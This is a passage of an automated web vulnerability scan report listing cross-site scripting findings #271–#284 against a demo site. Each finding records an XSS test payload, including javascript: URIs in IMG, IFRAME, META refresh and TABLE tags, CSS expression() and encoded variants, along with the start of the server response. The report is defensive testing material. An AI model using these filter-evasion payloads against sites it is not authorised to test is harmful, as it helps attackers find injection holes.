href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #271\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=\"livescript:[code]\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #272Scan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# �script�alert(�XSS�)�/script�\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #273\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript\n:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #274\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;\nbase64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #275\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;\nURL=javascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #276\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #277\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></\nFRAMESET>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #278\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters DemoUser1# <TABLE BACKGROUND=\"javascript:alert('XSS')\"\n>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #279\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# echoed back in the response\nCWE-ID CWE-79\nIssue Number #280\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <DIV STYLE=\"background-image: url(javascript:alert('XSS'\n))\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #281\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <DIV STYLE=\"background-image:\\0075\\0072\\006C\\0028'\\006a\\\n0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\\n006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029'\\\n0029\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #282\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <DIV STYLE=\"background-image: url(&#1;javascript:alert('\nXSS'))\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #283Scan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <DIV STYLE=\"width: expression(alert('XSS'));\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #284\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 